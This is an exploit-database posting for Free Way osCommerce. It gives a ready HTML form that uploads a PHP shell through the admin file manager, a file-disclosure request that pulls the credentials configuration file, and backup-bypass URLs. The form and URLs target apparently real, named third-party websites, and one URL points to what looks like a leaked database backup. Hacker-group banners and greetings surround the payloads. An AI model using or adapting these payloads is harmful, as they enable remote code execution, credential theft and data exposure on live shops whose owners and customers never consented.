Free Way osCommerce suffers from backup related, file disclosure, and shell upload vulnerabilities.
deb392a1a7903348d0167f0991e8ddecec1f405715d0e637549f413ad5ea4b4a
========================================================
Free Way osCommerce Remote File Upload / File Disclosure
========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0 _ ____ ____ _____ __ _____ __ __ 1
1 _| | |__ | |__ | |___ | | | | _ | \ \ / / 0
0 |_ | __| | _| | / / | | | |_| | \ \/ / 1
1 | | |__ | |__ | / / __| | | _ | / / 0
0 | | __| | __| | / / / _ | | | | | / / 1
1 |_| |____| |____| /_/ / [_] | | | | | / / 0
0 Site:1337day.com /_______| |_| |_|/__/ 1
1 Support e-mail : submit[at]inj3ct0r.com 0
0 >> Exploit database separated by exploit 1
1 type (local, remote, DoS, etc.) 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1
#######################################################
# Vendor: http://www.zac-ware.com/
# Author : indoushka
+++=[ Dz Offenders Cr3w ]=+++
# KedAns-Dz * Caddy-Dz * Kalashinkov3
# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz
# Contact : ind0ushka@hotmail.com
# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
########################################################################
# Exploit By indoushka
-------------
<html><head><title> creloaded - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="https://secure.superc.com.au/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value=" Upload " >
</form>
<br><u>CREATE FILE:</u><br>
<form name="new_file" action="https://secure.superc.com.au/admin/shop_file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value=" Save " >
</form>
# File Disclosure :
in : admin/shop_file_manager.php/login.php?action=download&filename=
Exploit : admin/shop_file_manager.phpp/login.php/login.php?action=download&filename=/includes/_includes_configure.php
Example : http://[site]/[path]/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php
By pass Creat Download Backup :
http://jumpingfiestarentals.com/admin/backups/db_freewaydb3-20111019144921.sql
https://secure.superc.com.au/admin/shop_backup.php/login.php?action=backupnow
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te * ViRuS_HiMa * KedAns-Dz * Over-X
--------------------------------------------------------------------------------------------------------------------------------------